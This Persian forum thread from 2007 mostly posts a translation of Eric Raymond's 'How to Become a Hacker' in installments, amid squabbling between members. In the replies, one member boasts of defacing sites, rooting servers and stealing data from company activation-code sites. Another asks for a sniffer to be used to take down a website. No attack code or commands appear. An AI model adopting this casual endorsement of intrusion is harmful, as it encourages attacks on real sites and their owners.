در گذشته حوالی سال ۱۹۹۱ من ياد گرفتم که اکثر هکرهايی که انگليسی را به عنوان زبان دوم ياد گرفتهاند، حتی آنهایی که زبان مادری یکسانی دارند نيز آن را در بحثهای فنی بکار میبرند. من فهميدم که زبان انگليسی دايرهی لغات وسيعتری نسبت به هر زبان ديگری دارد و ابزار بهتری برای کار است. به همين دليل ترجمههای کتابهای تخصصی که به زبان انگليسی نوشته شدهاند زمانی که تمام کلمات آنها ترجمه میشوند، اغلب خوب نيستند. لينوس توروالدز که يک فنلاندی است. کد لينوکس خودش را به زبان انگليسی توضيح داد (او تابحال هرگز به طرز ديگری عمل نکرده است). تسلط او به زبان انگليسی عامل مهمی در ايجاد يک جامعهی جهانی از توسعه دهندگان برای لينوکس بود. اين نمونه ارزش پيروی دارد.
Naser_helboy
21-05-2007, 20:42
با تشکر از دوستانی که نظر دادن. اینم ادامه مقالات
کی نظر داده
من که چیزی ندیدم
بابا کپی رایت هم یه حدی داره آواتر منو گرفتی با فتوشاپ دسکاری کردی واسه خودت گذاشتی؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
واقعا کههههههههه
mazi_z_PSP
21-05-2007, 21:17
کی نظر داده
من که چیزی ندیدم
خب اینم واسه بازار گرمی بود!!!
mazi_z_PSP
21-05-2007, 21:19
بابا کپی رایت هم یه حدی داره آواتر منو گرفتی با فتوشاپ دسکاری کردی واسه خودت گذاشتی؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟
واقعا کههههههههه
منظورتو متوجه نميشم؟؟؟ این حرفا يعنی چی؟
شما می شه یه توضیح کامل از شل کدینگ و برنامه نویسی برای باگ های ریپورت شده بدین ؟ تا چه حد با برنامه نویسی توی لینوکس اشنایی دارین تا حالا چند تا سرور رو امن کردین تاحالا چند تا سایت رو مورد حمله قرار دادین؟ با یه دسترسیه ساده می تونین یه سرور رو کامل در اختیار بگیرین ؟ می دونین سایت چند جای بزرگ رو چطوری زدن؟میدونی از قسمت ارسال مقالات سایت های آموزشی و دانشگاه ها چه استفاده ها یی میشه؟ میدونی برنامه نویس های وب دانشگاه ها چقدر گاگولن؟ می دونی برای امنیت و هکینگ باید یکم تیز باشی ؟ میدونی اینا دیگه کاربرد نداره ؟ میدونی باید بشینی برنامه های سرور ها رو آنالیز کنی و یه باگی از اونا پیدا کنی؟ بلدی برای یه باگ اوور فلو یا همون سرریز بافر توی لینوکس با زبان پرل ایکسپلوییت لوکال بنویسی ؟به کل از کرنل لینوکس یا هسته ی ویندوز چی می دونی؟ سیستم عامل چطوری میاد بالا؟ چطور می شه وقتی تو ویندوز هایپر نت می کنی بعد سیستمت رو روشن می کنی همه ی پنجره ها تو همون حالت قبل از هایپر نت هستن؟
می دونی الان دزدی اطلاعات خیلی مهمتر از هک های دیگه شده می دونی چرا گیر دادیم به سایت شرکت هایی که کد فعال سازی نرم افزار هاشون رو از طریق سایتشون میدن به کاربر؟
شما کجایی و هکر ها و امنیت کار های امروزی کجان!! شما هنوز موندی هکر کیه یکیم میاد رو یه سرور روزی 2 یا 3 بار سرک می کشه ببینم فلان دوست پرشین تولزیمون برنامه ای نوشته و نمونه ای از برنامش رو سایت گذاشته مثلا فالان برنامه ی پخش موزیک آنلانش رو کامل کرده ؟ یا فلان سایت سورس برنامه ی مدیریت دانشگاه تهران رو گذاشته رو سایتش و 4 مگ سورسه باحال توی وی بی !!!!
نمی خوام بگم شما چیزی از امیت سرت نمی شه ولی باید بگم این چیزایی که شما می گی رو همه الان می دونن نیازی به دوباره گویی نیست (تجربه را تجربه کردن خطاست : : منی که می دونم کرنل 2.6.9 (اونزمان که گیره این چیزا بودم اینجوری که می گم بود) با اون ایکپلوییت که دسترسی رو به حد آخر (به قول ایمان به اون حد آخر مستی و نعشگی) یعنی روت میرسونه بخوام روت کنم سرور کرش می کنه و این مساله رو دیدم نباید این کار رو رو یه سرور دیگه انجام بدم).
حالا اینم بگم بدون دوست من بنده یه 8 ماهی می شه بدون سر و صدا هم تیمم که دیفیس هاش نشون می داد که تیم هشتم تو ایرانه رو جمع کردم و از بحث امنیت و هکینگ کناره گیری کردم و رو آوردم به مبحث امنیت نرم افزار و کرکینگ حالا همه ی اینا به کنار این نکته رو بدون هرچی می دونی بزار بمونه واسه خودت آموزش اینجور چیزا حرامه همین وبس.
از دست منم ناراحت شدی تو رو قسمت میدم به جان عزیزت اینجا پستی نده بیا تو پیام خصوصی هر حرفی دلت خواست بهم بزن . اینا رو گفتم بدونی باید بری پی این چیزا نه اینکه هکر کیه هکر چطوریه ؟ بعضی وقت ها کلاه سفیدا کاری می کنن که ..... هکر هکره هیچ فرقی نداره.
یا علی
mazi_z_PSP
22-05-2007, 12:15
شما می شه یه توضیح کامل از شل کدینگ و برنامه نویسی برای باگ های ریپورت شده بدین ؟ تا چه حد با برنامه نویسی توی لینوکس اشنایی دارین تا حالا چند تا سرور رو امن کردین تاحالا چند تا سایت رو مورد حمله قرار دادین؟ با یه دسترسیه ساده می تونین یه سرور رو کامل در اختیار بگیرین ؟ می دونین سایت چند جای بزرگ رو چطوری زدن؟میدونی از قسمت ارسال مقالات سایت های آموزشی و دانشگاه ها چه استفاده ها یی میشه؟ میدونی برنامه نویس های وب دانشگاه ها چقدر گاگولن؟ می دونی برای امنیت و ناراحت شدی تو رو قسمت میدم به جان عزیزت اینجا پستی نده بیا تو پیام خصوصی هر حرفی دلت خواست بهم بزن . اینا رو گفتم بدونی باید بری پی این چیزا نه اینکه هکر کیه هکر چطوریه ؟ بعضی وقت ها کلاه سفیدا کاری می کنن که ..... هکر هکره هیچ فرقی نداره.
یا علی
اصلا از لحنت خوشم نيامد.اگر ميخوای تند حرف بزنی من از تو بدترم انقدر بهت حرف ميزنم تا هم تورو هم منو اخراج کنن.به پيقام خصوصی هم کاری ندارم. اینجا هرچی گزاشتم برايه مبتدی هستش برايه کسايی که هيچی حاليشون نيست. کم کم حرفه ای ميشه مقالات و رويه وی بی تمرکز ميکنه. شرمنده که اینجوری حرف زدم اما اگر فکر ميکنی اینا بدرد نميخورن ميتونی به این تاپيک کمک کنی و چيزای بهتری بزاری.من با آقوش باز ازت پزيرايی ميکنم.بر فرض که من هيچی از این چيزايی که گفتی بلد نيستم.اما بايد بهت بگم که خيلی ها اینجا مثله منن و اینجا فقط برايه حرفه ای هايی نيست که مثل تو سر تا پا غرور گرفتّشون. در هر صورت از نظراتت ممنونم
mazi_z_PSP
22-05-2007, 12:21
شما می شه یه توضیح کامل از شل کدینگ و برنامه نویسی برای باگ های ریپورت شده بدین ؟ تا چه حد با برنامه نویسی توی لینوکس اشنایی دارین تا حالا چند تا سرور رو امن کردین تاحالا چند تا سایت رو مورد حمله قرار دادین؟ با یه دسترسیه ساده می تونین یه سرور رو کامل در اختیار بگیرین ؟ می دونین سایت چند جای بزرگ رو چطوری زدن؟میدونی از قسمت ارسال مقالات سایت های آموزشی و دانشگاه ها چه استفاده ها یی میشه؟ میدونی برنامه نویس های وب دانشگاه ها چقدر گاگولن؟ می دونی برای امنیت و هکینگ باید یکم تیز باشی ؟ میدونی اینا دیگه کاربرد نداره ؟ میدونی باید بشینی برنامه های سرور ها رو آنالیز کنی و یه باگی از اونا پیدا کنی؟ بلدی برای یه باگ اوور فلو یا همون سرریز بافر توی لینوکس با زبان پرل ایکسپلوییت لوکال بنویسی ؟به کل از کرنل لینوکس یا هسته ی ویندوز چی می دونی؟ سیستم عامل چطوری میاد بالا؟ چطور می شه وقتی تو ویندوز هایپر نت می کنی بعد سیستمت رو روشن می کنی همه ی پنجره ها تو همون حالت قبل از هایپر نت هستن؟
می دونی الان دزدی اطلاعات خیلی مهمتر از هک های دیگه شده می دونی چرا گیر دادیم به سایت شرکت هایی که کد فعال سازی نرم افزار هاشون رو از طریق سایتشون میدن به کاربر؟
شما کجایی و هکر ها و امنیت کار های امروزی کجان!! شما هنوز موندی هکر کیه یکیم میاد رو یه سرور روزی 2 یا 3 بار سرک می کشه ببینم فلان دوست پرشین تولزیمون برنامه ای نوشته و نمونه ای از برنامش رو سایت گذاشته مثلا فالان برنامه ی پخش موزیک آنلانش رو کامل کرده ؟ یا فلان سایت سورس برنامه ی مدیریت دانشگاه تهران رو گذاشته رو سایتش و 4 مگ سورسه باحال توی وی بی !!!!
نمی خوام بگم شما چیزی از امیت سرت نمی شه ولی باید بگم این چیزایی که شما می گی رو همه الان می دونن نیازی به دوباره گویی نیست (تجربه را تجربه کردن خطاست : : منی که می دونم کرنل 2.6.9 (اونزمان که گیره این چیزا بودم اینجوری که می گم بود) با اون ایکپلوییت که دسترسی رو به حد آخر (به قول ایمان به اون حد آخر مستی و نعشگی) یعنی روت میرسونه بخوام روت کنم سرور کرش می کنه و این مساله رو دیدم نباید این کار رو رو یه سرور دیگه انجام بدم).
حالا اینم بگم بدون دوست من بنده یه 8 ماهی می شه بدون سر و صدا هم تیمم که دیفیس هاش نشون می داد که تیم هشتم تو ایرانه رو جمع کردم و از بحث امنیت و هکینگ کناره گیری کردم و رو آوردم به مبحث امنیت نرم افزار و کرکینگ حالا همه ی اینا به کنار این نکته رو بدون هرچی می دونی بزار بمونه واسه خودت آموزش اینجور چیزا حرامه همین وبس.
از دست منم ناراحت شدی تو رو قسمت میدم به جان عزیزت اینجا پستی نده بیا تو پیام خصوصی هر حرفی دلت خواست بهم بزن . اینا رو گفتم بدونی باید بری پی این چیزا نه اینکه هکر کیه هکر چطوریه ؟ بعضی وقت ها کلاه سفیدا کاری می کنن که ..... هکر هکره هیچ فرقی نداره.
یا علی
از این چيزايی که گفتی مقاله بزار
mazi_z_PSP
22-05-2007, 12:28
نويسنده: Eric Steven Raymond (esr@thyrsus.com)مترجم: ميثم فرضعلیپور (meisam460@hotmail.com?subject=HTBH)
وضع فرهنگ هکرها
مانند اکثر فرهنگهايی که مبتنی بر اقتصاد پولی نيستند، جامعهی هکرها بر پايهی شهرت و اعتبار استوار است. شما سعی میکنيد که مسائل جالب را حل کنيد اما اينکه آنها چقدر جالب هستند و اينکه راهحل شما واقعاً چقدر خوب است، موضوعی است که در آن فقط افرادی که از نظر فنی همسطح شما و بالاتر هستند میتوانند نظر بدهند. هنگامی که شما وارد بازی هکرها میشوید ياد میگيريد که مدارجتان را با -توجه به نظری که ديگران راجع به مهارت شما دارند- بالاتر از ديگران نگاه داريد. (به همين دليل شما يک هکر واقعی نمیشويد مگر آنکه هکرهای ديگر شما را هکر بنامند) اين واقعيت با تصويری از هکری به عنوان کاری در انزوا به فراموشی سپرده شده است.
همچنين با يک تابو در فرهنگ هکری(که البته در حال از بين رفتن است ولی کماکان وجود دارد) برخلاف پذيرفتن اينکه خود فرد يا اعتبار او در بين ديگران در انگيزهی فرد موثر هستند. انسان شناسان جامعهی هکرها را فرهنگ هدیه مینامند. شما اعتبار و مقام به دست میآوريد ولی نه به وسيلهی تسلط داشتن بر ديگران، زيبايی يا داشتن آنچه ديگران میخواهند. بلکه با بخشش مخصوصاً در اختيار ديگران قرار دادن خلاقيت و حاصل مهارتهای خود. به طور کلی ۵ نوع کار وجود دارد که شما میتوانيد با انجام آنها در بين هکرها محبوبيت کسب کنيد:
mazi_z_PSP
22-05-2007, 12:29
۱-نرمافزار منبعباز بنويسيد
اولين(مهمترين و متداولترين) کار، نوشتن برنامههايی که هکرهای ديگر فکر میکنند جالب يا مفيد هستند و انتشار کد منبع آنها در ميان هکرهاست. (در گدشته ما به چنين کارهايی Free Software میگفتيم. اما اين اصطلاح مردم بسيار زيادی که نمیدانستند Free در اينجا به چه معنايی است را گيج میکرد. بنابراين اکثر ما (بر طبق آمار حاصل از محتوای صفحات وب، با حداقل نسبت ۲ به ۱) اکنون ترجيح میدهيم که ار اصطلاح نرمافزار Open Source ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) استفاده کنيم) محترمترين افراد در جامعهی هکرها افرادی هستند که برنامههای بزرگ و توانمند نوشتهاند که افراد بسياری به آن نرمافزارها احتياج دارند و آن نرمافزارها را در کل جامعهی هکرها منتشر کردهاند تا همهی افراد بتوانند از آن استفاده کنند.
mazi_z_PSP
22-05-2007, 12:30
۲-به تست و اشکالزدایی نرمافزارهای منبعباز کمک کنيد
همچنين کسانی که عهدهدار اشکاليابی و اشکالزدايی نرمافزارها میشوند نيز مفيد هستند. در دنيای امروزی ما ناگزیر به صرف بيشتر وقت توسعهی نرمافزارهايمان در مرحلهی اشکال زدايی هستیم. به همين دليل هر نويسندهی نرمافزار منبع باز به شما خواهد گفت که آزمايشگران خوب مرحلهی بتا (آزمايشگران مرحلهی بتا کسانی هستند که میدانند که چگونه علائم اشکال را دقيق توضيح دهند، محل اشکالات را به خوبی مشخص کنند و میتوانند با اشکالاتی که در نسخههای اوليه وجود دارد کنار بيايند و چند روش تشخيص محل عيب ساده را انجام بدهند) به اندازهی طلای هموزنشان ارزشمندند به قدری که حتی یکی از آنها میتوانند مرحلهی اشکال زدايی را از يک کابوس طولانی و خسته کننده را به يک دردسر عبرتآموز تبديل کنند.
اگر شما يک مبتدی هستيد، سعی کنيد که برنامهی در دست توسعه که مورد علاقهی شما باشد، پيدا کنيد و تلاش کنيد تا يک آزمايشگر مرحلهی بتای خوب باشيد. يک فرآيند طبيعی برای پيشرفت از کمک به آزمايش نرمافزارها تا اشکال زدايی آنها و از اشکال زدايی تا تغيير دادن آنها وجود دارد. به اين ترتيب شما چيزهای زيادی ياد میگيريد و روابط خوبی با کسانی که در آينده به شما کمک خواهند کرد، پيدا میکنيد.
mazi_z_PSP
22-05-2007, 12:31
۳-اطلاعات مفيد را منتشر کنيد
يک کار خوب ديگر جمعآوری و انتشار اطلاعات مفيد و جالب در صفحات وب يا متونی مانند «مجموعهی پرسشهای متداول» و در اختيار ديگران قرار دادن آنها است. گردانندگان مجموعههای پرسشهای متداول بزرگ در زمينههای فنی، تقريباً به اندازهی نويسندگان نرمافزارهای منبعباز محبوبيت کسب میکنند.
۴-به انجام کارهای زيربنايی کمک کنيد
جامعهی هکرها (و به تبع آن توسعهی فنی مهندسی اينترنت) به وسيلهی داوطلبان پيشرفت میکند. کارهای ضروری و خسته کنندهی بسياری وجود دارند که برای ادامهی پيشرفت لازم است انجام داده شوند. مانند مديريت فهرستهای پستی، نظارت بر گروههای خبری، مديريت و نگهداری سايتهای بزرگ آرشيو نرمافزارها، توسعهی RFC ها و استانداردهای فنی ديگر نظير آنها.
افرادی که چنين کارهايی را به خوبی انجام میدهند، در بين ديگران بسيار مورد احترام قرار میگيرند. زيرا هر کسی میداند که اين کارها به مقدار زيادی وقت نياز دارند و به اندازهی بازی با کدمنبع نرمافزارها جالب نيستند. انجام چنين کارهايی نشانهی فداکاری افراد است.
۵-در انتشار فرهنگ هکرها همکاری کنيد
و بالاخره شما میتوانيد در انتشار خود فرهنگ هکرها مفيد باشيد. (برای مثال با نوشتن يک مقالهی دقيق و صحيح در مورد اينکه چگونه يک هکر بشويم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) شما هنگام شروع در موقعیتی نيستيد که بتوانيد چنين کاری را انجام بدهيد مگر آنکه برای مدتی در بين هکرها باشيد و به خاطر يکی از چهار شيوهی بالا مشهور شده باشيد. جامعهی هکرها به طور مشخص رهبری ندارد. اما اين فرهنگ قهرمانها، پيشکسوتان، مورخان و سخنگويان خودش را دارد.اگر شما به مدت زيادی در بين هکرها باشيد، احتمالاً به يکی از اين گروهها خواهيد پيوست. اما مراقب باشيد:هکرها آشکارا پيشکسوتان خودشان را اذيت میکنند. پس مسلماً رسيدن به اين درجه از شهرت، بيشتر از تلاش برای بدست آوردن آن خطرناک است. شما بايد مراقب جايگاه خودتان باشيد و به جای تلاش برای رسيدن به شهرت کاری کنيد که اين موقعيت در مسير شما قرار گيرد. اين باعث پيشرفت شما خواهدشد و سپس در مقام خودتان متواضع و مهربان باشيد.
mazi_z_PSP
22-05-2007, 12:56
از دوست عزيزم Fares_N_Mcse هم از کمک به خاطر پيدا کردن مقالات تشکر ميکنم
mazi_z_PSP
22-05-2007, 20:54
ارتباط بين هکر و نرد(Nerd)
برخلاف تصور مردم برای هکر شدن لازم نيست که يک نرد باشيد .گرچه اين سودمند است و اکثر هکرها در واقع نرد هستند. داشتن روابط اجتماعی خوب به شما کمک میکند که بر روی مسائل واقعاً مهم مانند فکر کردن و هکری تمرکز کنيد. به همين دليل اکثر هکرها عنوان نرد را برای خود انتخاب کردهاند و حتی اصطلاح غليظتر geek را به نشانهی افتخار به کار میبرند. اين راهی برای نشان دادن استقلال آنها از عرف معمول در جامعه است.
برای بحث گستردهتر در اين مورد صفحهی geek ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد.
اگر شما میتوانيد بهخوبی بر روی هکری تمرکز کنيد تا يک هکر خوب باشيد و هم به زندگیتان برسید، اين خوب است. امروزه اين کار بسيار راحتتر از زمانی است که من يک مبتدی بودم (در دههی ۱۹۷۰).
امروزه برخورد هکرها با افراد مبتدی بسيار دوستانهتر است. همچنين تعداد افرادی که متوجه میشوند هکرها اغلب عاشقان خوب و همسردار هستند، در حال افزايش است. اگر شما به دليل نرد بودن، به هکری علاقهمند هستيد، اين هم خوب است. حداقل شما مشکل تمرکز حواس نداريد. شايد شما هم بعداً از انزوا خارج شويد.
در مورد نرم افزار snifer توضیح بدید و طرز کارش رو هم بگید و یه سایت رو باهاش بترکونید
تکنیک برتر
23-05-2007, 10:01
من هی می خواهم تو مطالب هک کرک و ویروس نویسی قاطی نشم ولی دیگه مشم.
راستش یه قزیه هست همه بدونن ما تو جائی که کار می کنیم هر ماه نقشه ای به ما میدن که با رنگ مثل (نرم افزار پاندا) نشان می دهد که در کدام کشور ها هک و ویروس نویسی زیاد است که نقشه کشور ایران به عنوان ویروس نویسی قرمز یعنی اول و در هک نارنجی یعنی دوم این نشونه این است که ایران هکرهاش دیگه.... غوغا کردن.
ارتباط بين هکر و نرد(Nerd)
برخلاف تصور مردم برای هکر شدن لازم نيست که يک نرد باشيد .گرچه اين سودمند است و اکثر هکرها در واقع نرد هستند. داشتن روابط اجتماعی خوب به شما کمک میکند که بر روی مسائل واقعاً مهم مانند فکر کردن و هکری تمرکز کنيد. به همين دليل اکثر هکرها عنوان نرد را برای خود انتخاب کردهاند و حتی اصطلاح غليظتر geek را به نشانهی افتخار به کار میبرند. اين راهی برای نشان دادن استقلال آنها از عرف معمول در جامعه است.
برای بحث گستردهتر در اين مورد صفحهی geek ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد.
اگر شما میتوانيد بهخوبی بر روی هکری تمرکز کنيد تا يک هکر خوب باشيد و هم به زندگیتان برسید، اين خوب است. امروزه اين کار بسيار راحتتر از زمانی است که من يک مبتدی بودم (در دههی ۱۹۷۰).
امروزه برخورد هکرها با افراد مبتدی بسيار دوستانهتر است. همچنين تعداد افرادی که متوجه میشوند هکرها اغلب عاشقان خوب و همسردار هستند، در حال افزايش است. اگر شما به دليل نرد بودن، به هکری علاقهمند هستيد، اين هم خوب است. حداقل شما مشکل تمرکز حواس نداريد. شايد شما هم بعداً از انزوا خارج شويد.
اقا ممنون از اموزش خوبتون
خسته نباشید لطفا ادامه بدید
برام جالبه بدونم شما کجا کار میکنید که هرماه لیست این کشورها رو به شما میدن
Payman_62
24-05-2007, 02:01
سلام.
تکنیک برتر جان کدوم کشور تو هک رنگ قرمز داره؟
فکر میکنم برزیل یا هند باشه.
Payman_62
24-05-2007, 02:21
سلام.
mx_2dar
HoseinVig
Naser_helboy
لطفا پست بی ارتباط به هک ندید.
تکنیک برتر
24-05-2007, 03:16
سلام پیمان جان
آمریکا ژاپن آلمان هند
mazi_z_PSP
24-05-2007, 22:00
البته دوستان تا اونجايی که من اطلاع دارم يکی از بزرگ ترين کشور های جهان تو هک روسيه هستش.و این رو هم ميدونم که نسخه های اوليه برنامه های معروف مثل ويستا تو این کشور هک ميشن.
mazi_z_PSP
24-05-2007, 22:00
من هی می خواهم تو مطالب هک کرک و ویروس نویسی قاطی نشم ولی دیگه مشم.
راستش یه قزیه هست همه بدونن ما تو جائی که کار می کنیم هر ماه نقشه ای به ما میدن که با رنگ مثل (نرم افزار پاندا) نشان می دهد که در کدام کشور ها هک و ویروس نویسی زیاد است که نقشه کشور ایران به عنوان ویروس نویسی قرمز یعنی اول و در هک نارنجی یعنی دوم این نشونه این است که ایران هکرهاش دیگه.... غوغا کردن.
خيلی خيلی خوشحال ميشم بيشتر به اینجا سر بزنی
mazi_z_PSP
24-05-2007, 22:01
در مورد نرم افزار snifer توضیح بدید و طرز کارش رو هم بگید و یه سایت رو باهاش بترکونید
سعی ميکنم پيدا کنم اما از دوستان ديگه هم ميخوام که اگه مطلبی دارن صبر نکنن
mazi_z_PSP
24-05-2007, 22:05
سلام.
mx_2dar
HoseinVig
Naser_helboy
لطفا پست بی ارتباط به هک ندید.
Thanks
ممنون
mazi_z_PSP
24-05-2007, 22:07
نويسنده: Eric Steven Raymond (esr@thyrsus.com)
مترجم: ميثم فرضعلیپور (meisam460@hotmail.com?subject=HTBH)
نکات مهم
دوباره میگويم برای هکر شدن شما ناچاريد که طرز فکر هکرها را يادبگيريد. کارهايی وجود دارند که شما هنگامی که در کنار کامپيوتر نيستيد، میتوانيد انجام بدهيد. اين کارها به هکر شدن شما کمک میکنند اما جايگزينی برای هکری نيستند (هيچ چيز ديگری نيست) اما اکثز هکرها اين کارها را انجام میدهند و احساس میکنند که اينها به نوعی به اساس هکری ارتباط دارند.
ياد بگيريد که زبان مادری خودتان را به خوبی بنويسيد. گرچه اين پندار عمومی که هکرها نويسندگان خوبی نيستند، وجود دارداما تعداد زيادی از هکرها (شامل تمام هکرهای ماهری که من میشناسم) نويسندگان بسيار توانايی هستند. داستانهای علمی-تخیلی بخوانيد و به بحثهايی در مورد داستانهای علمی-تخیلی بپيونديد (اين يک روش خوب برای آشنا شدن با هکرها و هکردوستان است).
يکی از شاخههای هنرهای رزمی را ياد بگيريد. شيوهی پرورش ذهنی که برای هنرهای رزمی لازم است، در بسياری از جهات با کاری که هکرها انجام میدهند، مشابه است. پرطرفدارترين شاخهها در ميان هکرها، هنرهای رزمی بدون سلاح هستند. مانند: نکواندو، کاراته، وينگ چون، آيکيدو و جوجيتسو. هنرهای شمشير بازی غربی و آسيايی نيز طرفداران قابل ملاحظهای دارند. در جاهايی که شليک با هفتتير قانونی است، اين شاخه نيز طرفداران زيادی از اواخر دههی ۹۰ پيدا کرده است. بهترين هنرهای رزمی برای هکرها آنهايی هستند که به پرورش ذهنی، تمرکز اعصاب و کنترل خود بيشتر از قدرت، ورزشگرايی و سختی جسمی اهميت میدهند.
مديتيشن را به طور منظم تمرين کنيد. Zen همواره در ميان هکرها محبوب است. (شما میتوانيد از Zen استفاده کنيد بدون اينکه مجبور شويد به مذهب جديدی روی بياوريد يا از مذهبی که داريد دست بکشيد.) سبکهای ديگر نيز مفيد هستند اما مراقب باشيد يکی از آن سبکهايی را انتخاب کنيد که نيازی به باور عقايد ديوانهوار نداشته باشد.
مهارتهای شنوايی خودتان را در زمينهی موسيقی توسعه دهيد. باد بگيريد که بتوانيد از نوع خاصی از موسيقی را درک کرده و از آن لذت ببريد. ياد بگيريد که چگونه يک ساز را خوب بنوازيد يا چگونه آواز بخوانيد.
مهارت خودتان را در جناس و بازی با کلمات بيشتر کنيد.
هر قدر که تعداد بيشتری از اين کارها را از قبل انجام بدهيد، استعداد ذاتی شما برای هکر شدن به همان اندازه بيشتر است. دليل انجام اين کارها به طور واضح معلوم نيست اما آنها به ترکيبی از مهارتهای نيمکرهی راست و چپ مغز ارتباط دارند که به نظر میآيد مهم باشد. هکرها بايد در لحظهای که به مسئلهای فکر میکنند، هم به تفکر منطقی قادر باشند و هم به نمودهای ظاهری مسئله توجه کنند.
زمانی که کار میکنيد، چنان با شور و شوق کار کنيد که انگار بازی میکنيد و چنان با دقت بازی کنيد که انگار کار میکنيد. برای هکرهای واقعی مرزی ميان بازی، کار، علم و هنر وجود ندارد. اين موضوعات با يکديگر ادغام میشوند تا يک سازندگی سطح بالاو مفرح به وجود آورند. شما نبايد به دامنهی کوچکی از مهارتها محدود بشويد.
گرچه معمولاً هکرها خوشان را به عنوان برنامهنويس معرفی میکنند اما اکثر آنها در زمينههای مرتبط نيز مهارت دارند. مديريت سيستم، طراحی صفحات وب و اشکال يابی سخت افزار کامپيوترهای شخصی موارد رايج هستند. يک هکر که مديريت سيستم را بر عهده دارد، به احتمال زياد در اسکریپت نويسی و طراحی صفحات وب مهارت دارد.
هکرها هيچگاه کاری را نصف و نيمه انجام نمیدهند. اگر آنها در زمينهای وقت صرف میکنند، حتماً تصميم گرفتهاند در آن زمينه بسيار خوب باشند.
و بالاخره چند کار که نبايد انجام بدهيد:
هرگز از نامهای مستعار احمقانه و پرزرقوبرق استفاده نکنيد
هرگز در جنگهای سرزنش ديگران در يوزنت (يا هر جای ديگری) شرکت نکنيد.
هرگز خودتان را يک ولگرد اينترنت (Cyber Punk) نناميد و هيچ گاه وقت خودتان را با کسی که چنين کاری را انجام میدهد، تلف نکنيد.
هرگز نوشتههای پر از غلط املائی و دستور زبانی را پست يا ميل نکنيد.
تنها چيزی که با انجام اين کارها به دست میآوريد، شهرت يافتن به عنوان يک احمق است. هکرها حافظهی طولانی مدتی دارند. ممکن است قبل از اينکه در ميان هکرها پذيرفته شويد، مجبور باشيد که سالها با سابقهی دسته گلهايی که به آب دادهايد، زندگی کنيد.
مشکلات ناشی از اسامی مستعار يا هويتهای مجازی نياز به شرح و توضيح بيشتری دارد: پنهان کردن هويت خود پشت يک نقاب رفتار بچهگانه (و احمقانه)ی افرادی از قبيل کرکرها، قفلشکنان و گونههايی ديگر از زندگی سطح پايين است. هکرها هيچوقت چنين کاری انجام نمیدهند. هکرها با کارهايی که انجام میدهند، افتخار میکنند و دوست دارند که اين کارها با نام واقعی آنها پيوند بخورد. پس اگر شما نقابی بر چهره داريد، آن را برداريد. در ميان هکرها آن نقاب شما را فقط به عنوان يک بازنده معرفی خواهد کرد.
mazi_z_PSP
24-05-2007, 22:07
منابع ديگر
پل گراهام مقالهای به نام هکرهای بزرگ ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) و مقالهی دیگری به نام در حال تحصیل ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نوشته است که حاوی اطلاعات زيادی است.
Peter Seebach گردانندهی يک فهرست پرسشهای متداول در مورد هکرها ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) است. اين پرسشها مخصوص مديرانی است که نمیدانند چگونه با هکرها رفتار بکنند.
مقالهای به نام «چگونه يک برنامهنویس بشويم ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])» وجود دارد که يک مکمل عالی برای اين متن است. اين متن توصيههای با ارزشی در مورد کد نويسی، طرز فکر برنامه نويسان و چگونگی همکاری در يک تيم برنامهنويسی دارد.
همچنين من يک مقاله در مورد تاريخ جامعهی هکرها ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نوشتهام.
من مقالهای به نام The Cathedral and the Bazaar ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نوشتهام که حاوی توضيحات بسياری در مورد نحوهی کارکرد جامعهی لينوکس و جنبش منبعباز است. من همچنين در Homesteading the Noosphere ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) مستقيماً به نتايج اين موضوع پرداختهام.
Rick Moen مقالهی فوقالعادهای در مورد اينکه «چگونه يک گروه کاربران لينوکس را اداره کنيم ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])» نوشته است.
من با Rick Moen در نوشتن مقالهای به نام «چگونه سوالات خود را زيرکانه بپرسيم ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])» همکاری کردهام. اين مقاله به شما کمک میکند سوالات خود را به روشی بپرسيد که راحتتر به جواب برسيد.
اگر شما به مطالبی در مورد چگونگی کارکرد کامپيوترهای شخصی، يونيکس يا اينترنت نياز داشتيد، مبانی کارکرد يونيکس و اينترنت ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد.
اگر تصميم گرفتيد که نرمافزاری را منتشر کنيد يا الحاقيههايی برای نرمافزارهای مختلف بنويسید، اين راهنمای قدمبهقدم تمرين نحوهی انتشار نرمافزارها ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را دنبال کنيد. اگر شما از شعرهای Zen خوشتان آمده، ممکن است مايل باشيد که Rootless Root: The Unix Koans of Master Foo ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد.
mazi_z_PSP
24-05-2007, 22:08
فهرست پرسشهای متداول
س: آيا شما به من هکر شدن را ياد میدهيد؟
